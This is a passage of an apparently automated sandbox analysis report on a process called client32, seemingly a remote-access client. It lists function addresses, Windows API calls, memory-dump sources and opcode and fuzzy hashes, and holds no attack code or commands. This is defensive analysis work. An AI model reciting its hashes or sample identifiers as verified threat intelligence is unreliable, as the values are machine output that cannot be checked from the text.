                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Closewvsprintf
                                                                                                                                                                                                    • String ID: Error %d closing regkey %x
                                                                                                                                                                                                    • API String ID: 843752472-892920262
                                                                                                                                                                                                    • Opcode ID: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
                                                                                                                                                                                                    • Instruction ID: 92a7a0ee5207e3186e072fae0831ab025553d10eab44dfd4ffee7659da325c5a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEE08675602152DFD335CA1EAC58F67B6D99FC9710F12456DB841D3300DB70C8418660
                                                                                                                                                                                                    Function 111429E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(NSMTRACE,?,1102D904,Function_000261F0,0072B858,?,?,?,00000100), ref: 111429F9
                                                                                                                                                                                                      • Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                    • String ID: NSMTRACE
                                                                                                                                                                                                    • API String ID: 4133054770-4175627554
                                                                                                                                                                                                    • Opcode ID: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                                                                                                    • Instruction ID: 309f5c028bc3f4bd42ffbc0ff88fedcb33e8baf52d9891cbdd74bffcbc1e2387
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93D05E712417378BCB17AFED98953B8FBE8B70865D3340075D825D3A04EB70E0408B61
                                                                                                                                                                                                    Function 110259A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll), ref: 110259A8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: psapi.dll
                                                                                                                                                                                                    • API String ID: 1029625771-80456845
                                                                                                                                                                                                    • Opcode ID: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
                                                                                                                                                                                                    • Instruction ID: e7d689bb3e0256121f65424e75b73c3f9b38c7483ec2d975ead7d22227fa1e2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DE009B1A01B118FC3B0CF3A9544646BAF0BB186103118A3ED0AEC3A00E330A5448F90
                                                                                                                                                                                                    Function 68594F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,68598DC8), ref: 68594F78
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: psapi.dll
                                                                                                                                                                                                    • API String ID: 1029625771-80456845
                                                                                                                                                                                                    • Opcode ID: db31c45bf9382b5e9960c4961a9dfe3fe824b9136a4ad7c62bc5c4ee202b4110
                                                                                                                                                                                                    • Instruction ID: b761ed76ea0f9ce8f81cf52a1ef79c57d507c6a42b64ba97d65a0e7c60646a59
                                                                                                                                                                                                    • Opcode Fuzzy Hash: db31c45bf9382b5e9960c4961a9dfe3fe824b9136a4ad7c62bc5c4ee202b4110
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36E001B1901B108F87B0CF3AA50464ABEF0BB086503118A2E949EC3A10E330A5858F84
                                                                                                                                                                                                    Function 11015160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101516E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: nslsp.dll
                                                                                                                                                                                                    • API String ID: 1029625771-3933918195
                                                                                                                                                                                                    • Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                                                                                                                    • Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2
                                                                                                                                                                                                    Function 11073E70 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 11073ECF
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11073F39
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeLibrary_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1654520187-0
                                                                                                                                                                                                    • Opcode ID: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
                                                                                                                                                                                                    • Instruction ID: a025be61f5cc20f5ad5b88b5485e82962b2b8b991e0ff8e486065cca72918f8b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A21B076E00228A7DB10DE59EC45BEFFBB8FB44314F0041AAF9099B240E7759A54CBE1
                                                                                                                                                                                                    Function 11087510 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1108752F
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,?,1117CF74,?), ref: 110875A0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalInitializeSection_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 453477542-0
                                                                                                                                                                                                    • Opcode ID: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
                                                                                                                                                                                                    • Instruction ID: 75295544d9195e04375e6fd21bc40551df4152833ee3a01bc0b81666db33725f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 711157B0902B148FC3A4CF7A89816C6FAE5BB48315F90892E96EEC2200DB716564CF91
                                                                                                                                                                                                    Function 11140AB0 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11140AD1
                                                                                                                                                                                                    • ExtractIconExA.SHELL32(?,00000000,000F042D,0001048B,00000001), ref: 11140B08
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExtractFileIconModuleName
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3911389742-0
                                                                                                                                                                                                    • Opcode ID: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
                                                                                                                                                                                                    • Instruction ID: fbd1f7f6eca67a3d4699d4d052ae62d0c626dfd316a41b503206f924cf5b890f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFF02478A4511C9FEB48CFE4CC86FBDF769E784708F808269EE12871C4CE7029488740
                                                                                                                                                                                                    Function 11160535 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF
                                                                                                                                                                                                    • __lock_file.LIBCMT ref: 1116057C
                                                                                                                                                                                                    • __fclose_nolock.LIBCMT ref: 11160587
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2959217138-0
                                                                                                                                                                                                    • Opcode ID: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
                                                                                                                                                                                                    • Instruction ID: c99a5f40794e7bd6d5a1a4a2a70ed171e4b9561b0896b3e5cf790a4aaee0ba1f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7F09035D11B179AD710AB7598047AEFBB86F0133CF118208C4649A1D0CBFEAA21DB96
                                                                                                                                                                                                    Function 685A6C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 685A6C26
                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 685A6C5B
                                                                                                                                                                                                      • Part of subcall function 685A6940: GetTickCount.KERNEL32 ref: 685A6950
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
